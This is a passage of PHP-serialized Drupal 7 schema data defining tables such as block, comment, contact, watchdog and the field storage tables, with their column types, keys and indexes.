null\";b:1;s:7:\"default\";s:0:\"\";}s:6:\"custom\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:4:\"tiny\";}s:10:\"visibility\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:4:\"tiny\";}s:5:\"pages\";a:2:{s:4:\"type\";s:4:\"text\";s:8:\"not null\";b:1;}s:5:\"title\";a:5:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";s:12:\"translatable\";b:1;}s:5:\"cache\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:1;s:4:\"size\";s:4:\"tiny\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"bid\";}s:11:\"unique keys\";a:1:{s:3:\"tmd\";a:3:{i:0;s:5:\"theme\";i:1;s:6:\"module\";i:2;s:5:\"delta\";}}s:7:\"indexes\";a:1:{s:4:\"list\";a:5:{i:0;s:5:\"theme\";i:1;s:6:\"status\";i:2;s:6:\"region\";i:3;s:6:\"weight\";i:4;s:6:\"module\";}}s:6:\"module\";s:5:\"block\";s:4:\"name\";s:5:\"block\";}s:10:\"block_role\";a:5:{s:6:\"fields\";a:3:{s:6:\"module\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:64;s:8:\"not null\";b:1;}s:5:\"delta\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;}s:3:\"rid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}}s:11:\"primary key\";a:3:{i:0;s:6:\"module\";i:1;s:5:\"delta\";i:2;s:3:\"rid\";}s:7:\"indexes\";a:1:{s:3:\"rid\";a:1:{i:0;s:3:\"rid\";}}s:6:\"module\";s:5:\"block\";s:4:\"name\";s:10:\"block_role\";}s:12:\"block_custom\";a:5:{s:6:\"fields\";a:4:{s:3:\"bid\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:4:\"body\";a:4:{s:4:\"type\";s:4:\"text\";s:8:\"not null\";b:0;s:4:\"size\";s:3:\"big\";s:12:\"translatable\";b:1;}s:4:\"info\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:6:\"format\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:0;}}s:11:\"unique keys\";a:1:{s:4:\"info\";a:1:{i:0;s:4:\"info\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"bid\";}s:6:\"module\";s:5:\"block\";s:4:\"name\";s:12:\"block_custom\";}s:11:\"cache_block\";a:5:{s:6:\"fields\";a:5:{s:3:\"cid\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"data\";a:3:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:0;s:4:\"size\";s:3:\"big\";}s:6:\"expire\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"created\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:10:\"serialized\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:5:\"small\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:7:\"indexes\";a:1:{s:6:\"expire\";a:1:{i:0;s:6:\"expire\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"cid\";}s:6:\"module\";s:5:\"block\";s:4:\"name\";s:11:\"cache_block\";}s:7:\"comment\";a:6:{s:6:\"fields\";a:14:{s:3:\"cid\";a:2:{s:4:\"type\";s:6:\"serial\";s:8:\"not null\";b:1;}s:3:\"pid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:3:\"nid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:3:\"uid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"subject\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:64;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:8:\"hostname\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:7:\"created\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"changed\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"status\";a:5:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:1;s:4:\"size\";s:4:\"tiny\";}s:6:\"thread\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;}s:4:\"name\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:60;s:8:\"not null\";b:0;}s:4:\"mail\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:64;s:8:\"not null\";b:0;}s:8:\"homepage\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:0;}s:8:\"language\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:12;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}}s:7:\"indexes\";a:5:{s:18:\"comment_status_pid\";a:2:{i:0;s:3:\"pid\";i:1;s:6:\"status\";}s:15:\"comment_num_new\";a:5:{i:0;s:3:\"nid\";i:1;s:6:\"status\";i:2;s:7:\"created\";i:3;s:3:\"cid\";i:4;s:6:\"thread\";}s:11:\"comment_uid\";a:1:{i:0;s:3:\"uid\";}s:20:\"comment_nid_language\";a:2:{i:0;s:3:\"nid\";i:1;s:8:\"language\";}s:15:\"comment_created\";a:1:{i:0;s:7:\"created\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"cid\";}s:12:\"foreign keys\";a:2:{s:12:\"comment_node\";a:2:{s:5:\"table\";s:4:\"node\";s:7:\"columns\";a:1:{s:3:\"nid\";s:3:\"nid\";}}s:14:\"comment_author\";a:2:{s:5:\"table\";s:5:\"users\";s:7:\"columns\";a:1:{s:3:\"uid\";s:3:\"uid\";}}}s:6:\"module\";s:7:\"comment\";s:4:\"name\";s:7:\"comment\";}s:23:\"node_comment_statistics\";a:6:{s:6:\"fields\";a:6:{s:3:\"nid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:3:\"cid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:22:\"last_comment_timestamp\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:17:\"last_comment_name\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:60;s:8:\"not null\";b:0;}s:16:\"last_comment_uid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:13:\"comment_count\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:11:\"primary key\";a:1:{i:0;s:3:\"nid\";}s:7:\"indexes\";a:3:{s:22:\"node_comment_timestamp\";a:1:{i:0;s:22:\"last_comment_timestamp\";}s:13:\"comment_count\";a:1:{i:0;s:13:\"comment_count\";}s:16:\"last_comment_uid\";a:1:{i:0;s:16:\"last_comment_uid\";}}s:12:\"foreign keys\";a:2:{s:15:\"statistics_node\";a:2:{s:5:\"table\";s:4:\"node\";s:7:\"columns\";a:1:{s:3:\"nid\";s:3:\"nid\";}}s:19:\"last_comment_author\";a:2:{s:5:\"table\";s:5:\"users\";s:7:\"columns\";a:1:{s:16:\"last_comment_uid\";s:3:\"uid\";}}}s:6:\"module\";s:7:\"comment\";s:4:\"name\";s:23:\"node_comment_statistics\";}s:7:\"contact\";a:6:{s:6:\"fields\";a:6:{s:3:\"cid\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:8:\"category\";a:5:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";s:12:\"translatable\";b:1;}s:10:\"recipients\";a:3:{s:4:\"type\";s:4:\"text\";s:8:\"not null\";b:1;s:4:\"size\";s:3:\"big\";}s:5:\"reply\";a:3:{s:4:\"type\";s:4:\"text\";s:8:\"not null\";b:1;s:4:\"size\";s:3:\"big\";}s:6:\"weight\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:8:\"selected\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:4:\"tiny\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"cid\";}s:11:\"unique keys\";a:1:{s:8:\"category\";a:1:{i:0;s:8:\"category\";}}s:7:\"indexes\";a:1:{s:4:\"list\";a:2:{i:0;s:6:\"weight\";i:1;s:8:\"category\";}}s:6:\"module\";s:7:\"contact\";s:4:\"name\";s:7:\"contact\";}s:8:\"watchdog\";a:5:{s:6:\"fields\";a:11:{s:3:\"wid\";a:2:{s:4:\"type\";s:6:\"serial\";s:8:\"not null\";b:1;}s:3:\"uid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:4:\"type\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:64;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:7:\"message\";a:3:{s:4:\"type\";s:4:\"text\";s:8:\"not null\";b:1;s:4:\"size\";s:3:\"big\";}s:9:\"variables\";a:3:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:1;s:4:\"size\";s:3:\"big\";}s:8:\"severity\";a:5:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:4:\"tiny\";}s:4:\"link\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:0;s:7:\"default\";s:0:\"\";}s:8:\"location\";a:2:{s:4:\"type\";s:4:\"text\";s:8:\"not null\";b:1;}s:7:\"referer\";a:2:{s:4:\"type\";s:4:\"text\";s:8:\"not null\";b:0;}s:8:\"hostname\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:9:\"timestamp\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:11:\"primary key\";a:1:{i:0;s:3:\"wid\";}s:7:\"indexes\";a:3:{s:4:\"type\";a:1:{i:0;s:4:\"type\";}s:3:\"uid\";a:1:{i:0;s:3:\"uid\";}s:8:\"severity\";a:1:{i:0;s:8:\"severity\";}}s:6:\"module\";s:5:\"dblog\";s:4:\"name\";s:8:\"watchdog\";}s:12:\"field_config\";a:5:{s:6:\"fields\";a:13:{s:2:\"id\";a:2:{s:4:\"type\";s:6:\"serial\";s:8:\"not null\";b:1;}s:10:\"field_name\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;}s:4:\"type\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;}s:6:\"module\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:6:\"active\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:4:\"tiny\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:12:\"storage_type\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;}s:14:\"storage_module\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:14:\"storage_active\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:4:\"tiny\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"locked\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:4:\"tiny\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:4:\"data\";a:4:{s:4:\"type\";s:4:\"blob\";s:4:\"size\";s:3:\"big\";s:8:\"not null\";b:1;s:9:\"serialize\";b:1;}s:11:\"cardinality\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:4:\"tiny\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:12:\"translatable\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:4:\"tiny\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"deleted\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:4:\"tiny\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:11:\"primary key\";a:1:{i:0;s:2:\"id\";}s:7:\"indexes\";a:8:{s:10:\"field_name\";a:1:{i:0;s:10:\"field_name\";}s:6:\"active\";a:1:{i:0;s:6:\"active\";}s:14:\"storage_active\";a:1:{i:0;s:14:\"storage_active\";}s:7:\"deleted\";a:1:{i:0;s:7:\"deleted\";}s:6:\"module\";a:1:{i:0;s:6:\"module\";}s:14:\"storage_module\";a:1:{i:0;s:14:\"storage_module\";}s:4:\"type\";a:1:{i:0;s:4:\"type\";}s:12:\"storage_type\";a:1:{i:0;s:12:\"storage_type\";}}s:6:\"module\";s:5:\"field\";s:4:\"name\";s:12:\"field_config\";}s:21:\"field_config_instance\";a:5:{s:6:\"fields\";a:7:{s:2:\"id\";a:2:{s:4:\"type\";s:6:\"serial\";s:8:\"not null\";b:1;}s:8:\"field_id\";a:2:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;}s:10:\"field_name\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:11:\"entity_type\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:6:\"bundle\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"data\";a:4:{s:4:\"type\";s:4:\"blob\";s:4:\"size\";s:3:\"big\";s:8:\"not null\";b:1;s:9:\"serialize\";b:1;}s:7:\"deleted\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:4:\"tiny\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:11:\"primary key\";a:1:{i:0;s:2:\"id\";}s:7:\"indexes\";a:2:{s:17:\"field_name_bundle\";a:3:{i:0;s:10:\"field_name\";i:1;s:11:\"entity_type\";i:2;s:6:\"bundle\";}s:7:\"deleted\";a:1:{i:0;s:7:\"deleted\";}}s:6:\"module\";s:5:\"field\";s:4:\"name\";s:21:\"field_config_instance\";}s:11:\"cache_field\";a:5:{s:6:\"fields\";a:5:{s:3:\"cid\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"data\";a:3:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:0;s:4:\"size\";s:3:\"big\";}s:6:\"expire\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"created\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:10:\"serialized\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:5:\"small\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:7:\"indexes\";a:1:{s:6:\"expire\";a:1:{i:0;s:6:\"expire\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"cid\";}s:6:\"module\";s:5:\"field\";s:4:\"name\";s:11:\"cache_field\";}s:23:\"field_data_comment_body\";a:6:{s:6:\"fields\";a:9:{s:11:\"entity_type\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:6:\"bundle\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:7:\"deleted\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:4:\"tiny\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:9:\"entity_id\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:11:\"revision_id\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:0;}s:8:\"language\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:5:\"delta\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:18:\"comment_body_value\";a:3:{s:4:\"type\";s:4:\"text\";s:4:\"size\";s:3:\"big\";s:8:\"not null\";b:0;}s:19:\"comment_body_format\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:0;}}s:11:\"primary key\";a:5:{i:0;s:11:\"entity_type\";i:1;s:9:\"entity_id\";i:2;s:7:\"deleted\";i:3;s:5:\"delta\";i:4;s:8:\"language\";}s:7:\"indexes\";a:7:{s:11:\"entity_type\";a:1:{i:0;s:11:\"entity_type\";}s:6:\"bundle\";a:1:{i:0;s:6:\"bundle\";}s:7:\"deleted\";a:1:{i:0;s:7:\"deleted\";}s:9:\"entity_id\";a:1:{i:0;s:9:\"entity_id\";}s:11:\"revision_id\";a:1:{i:0;s:11:\"revision_id\";}s:8:\"language\";a:1:{i:0;s:8:\"language\";}s:19:\"comment_body_format\";a:1:{i:0;s:19:\"comment_body_format\";}}s:12:\"foreign keys\";a:1:{s:19:\"comment_body_format\";a:2:{s:5:\"table\";s:13:\"filter_format\";s:7:\"columns\";a:1:{s:19:\"comment_body_format\";s:6:\"format\";}}}s:6:\"module\";s:17:\"field_sql_storage\";s:4:\"name\";s:23:\"field_data_comment_body\";}s:27:\"field_revision_comment_body\";a:6:{s:6:\"fields\";a:9:{s:11:\"entity_type\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:6:\"bundle\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:7:\"deleted\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:4:\"tiny\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:9:\"entity_id\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:11:\"revision_id\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:8:\"language\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:5:\"delta\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:18:\"comment_body_value\";a:3:{s:4:\"type\";s:4:\"text\";s:4:\"size\";s:3:\"big\";s:8:\"not null\";b:0;}s:19:\"comment_body_format\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:0;}}s:11:\"primary key\";a:6:{i:0;s:11:\"entity_type\";i:1;s:9:\"entity_id\";i:2;s:11:\"revision_id\";i:3;s:7:\"deleted\";i:4;s:5:\"delta\";i:5;s:8:\"language\";}s:7:\"indexes\";a:7:{s:11:\"entity_type\";a:1:{i:0;s:11:\"entity_type\";}s:6:\"bundle\";a:1:{i:0;s:6:\"bundle\";}s:7:\"deleted\";a:1:{i:0;s:7:\"deleted\";}s:9:\"entity_id\";a:1:{i:0;s:9:\"entity_id\";}s:11:\"revision_id\";a:1:{i:0;s:11:\"revision_id\";}s:8:\"language\";a:1:{i:0;s:8:\"language\";}s:19:\"comment_body_format\";a:1:{i:0;s:19:\"comment_body_format\";}}s:12:\"foreign keys\";a:1:{s:19:\"comment_body_format\";a:2:{s:5:\"table\";s:13:\"filter_format\";s:7:\"columns\";a:1:{s:19:\"comment_body_format\";s:6:\"format\";}}}s:6:\"module\";s:17:\"field_sql_storage\";s:4:\"name\";s:27:\"field_revision_comment_body\";}s:15:\"field_data_body\";a:6:{s:6:\"fields\";a:10:{s:11:\"entity_type\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:6:\"bundle\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:7:\"deleted\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:4:\"tiny\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:9:\"entity_id\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:11:\"revision_id\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:0;}s:8:\"language\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:5:\"delta\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:10:\"body_value\";a:3:{s:4:\"type\";s:4:\"text\";s:4:\"size\";s:3:\"big\";s:8:\"not null\";b:0;}s:12:\"body_summary\";a:3:{s:4:\"type\";s:4:\"text\";s:4:\"size\";s:3:\"big\";s:8:\"not null\";b:0;}s:11:\"body_format\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:0;}}s:11:\"primary key\";a:5:{i:0;s:11:\"entity_type\";i:1;s:9:\"entity_id\";i:2;s:7:\"deleted\";i:3;s:5:\"delta\";i:4;s:8:\"language\";}s:7:\"indexes\";a:7:{s:11:\"entity_type\";a:1:{i:0;s:11:\"entity_type\";}s:6:\"bundle\";a:1:{i:0;s:6:\"bundle\";}s:7:\"deleted\";a:1:{i:0;s:7:\"deleted\";}s:9:\"entity_id\";a:1:{i:0;s:9:\"entity_id\";}s:11:\"revision_id\";a:1:{i:0;s:11:\"revision_id\";}s:8:\"language\";a:1:{i:0;s:8:\"language\";}s:11:\"body_format\";a:1:{i:0;s:11:\"body_format\";}}s:12:\"foreign keys\";a:1:{s:11:\"body_format\";a:2:{s:5:\"table\";s:13:\"filter_format\";s:7:\"columns\";a:1:{s:11:\"body_format\";s:6:\"format\";}}}s:6:\"module\";s:17:\"field_sql_storage\";s:4:\"name\";s:15:\"field_data_body\";}s:19:\"field_revision_body\";a:6:{s:6:\"fields\";a:10:{s:11:\"entity_type\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:6:\"bundle\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:7:\"deleted\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:4:\"tiny\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:9:\"entity_id\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:11:\"revision_id\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:8:\"language\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:5:\"delta\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:10:\"body_value\";a:3:{s:4:\"type\";s:4:\"text\";s:4:\"size\";s:3:\"big\";s:8:\"not null\";b:0;}s:12:\"body_summary\";a:3:{s:4:\"type\";s:4:\"text\";s:4:\"size\";s:3:\"big\";s:8:\"not null\";b:0;}s:11:\"body_format\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:0;}}s:11:\"primary key\";a:6:{i:0;s:11:\"entity_type\";i:1;s:9:\"entity_id\";i:2;s:11:\"revision_id\";i:3;s:7:\"deleted\";i:4;s:5:\"delta\";i:5;s:8:\"language\";}s:7:\"indexes\";a:7:{s:11:\"entity_type\";a:1:{i:0;s:11:\"entity_type\";}s:6:\"bundle\";a:1:{i:0;s:6:\"bundle\";}s:7:\"deleted\";a:1:{i:0;s:7:\"deleted\";}s:9:\"entity_id\";a:1:{i:0;s:9:\"entity_id\";}s:11:\"revision_id\";a:1:{i:0;s:11:\"revision_id\";}s:8:\"language\";a:1:{i:0;s:8:\"language\";}s:11:\"body_format\";a:1:{i:0;s:11:\"body_format\";}}s:12:\"foreign keys\";a:1:{s:11:\"body_format\";a:2:{s:5:\"table\";s:13:\"filter_format\";s:7:\"columns\";a:1:{s:11:\"body_format\";s:6:\"format\";}}}s:6:\"module\";s:17:\"field_sql_storage\";s:4:\"name\";s:19:\"field_revision_body\";}s:21:\"field_data_field_tags\";a:6:{s:6:\"fields\";a:8:{s:11:\"entity_type\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:6:\"bundle\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:7:\"deleted\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:4:\"tiny\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:9:\"entity_id\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:11:\"revision_id\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:0;}s:8:\"language\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:5:\"delta\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:14:\"field_tags_tid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:0;}}s:11:\"primary key\";a:5:{i:0;s:11:\"entity_type\";i:1;s:9:\"entity_id\";i:2;s:7:\"deleted\";i:3;s:5:\"delta\";i:4;s:8:\"language\";}s:7:\"indexes\";a:7:{s:11:\"entity_type\";a:1:{i:0;s:11:\"entity_type\";}s:6:\"bundle\";a:1:{i:0;s:6:\"bundle\";}s:7:\"deleted\";a:1:{i:0;s:7:\"deleted\";}s:9:\"entity_id\";a:1:{i:0;s:9:\"entity_id\";}s:11:\"revision_id\";a:1:{i:0;s:11:\"revision_id\";}s:8:\"language\";a:1:{i:0;s:8:\"language\";}s:14:\"field_tags_tid\";a:1:{i:0;s:14:\"field_tags_tid\";}}s:12:\"foreign keys\";a:1:{s:14:\"field_tags_tid\";a:2:{s:5:\"table\";s:18:\"taxonomy_term_data\";s:7:\"columns\";a:1:{s:14:\"field_tags_tid\";s:3:\"tid\";}}}s:6:\"module\";s:17:\"field_sql_storage\";s:4:\"name\";s:21:\"field_data_field_tags\";}s:25:\"field_revision_field_tags\";a:6:{s:6:\"fields\";a:8:{s:11:\"entity_type\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:6:\"bundle\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:7:\"deleted\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:4:\"tiny\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:9:\"entity_id\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:11:\"revision_id\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:8:\"language\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:5:\"delta\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not 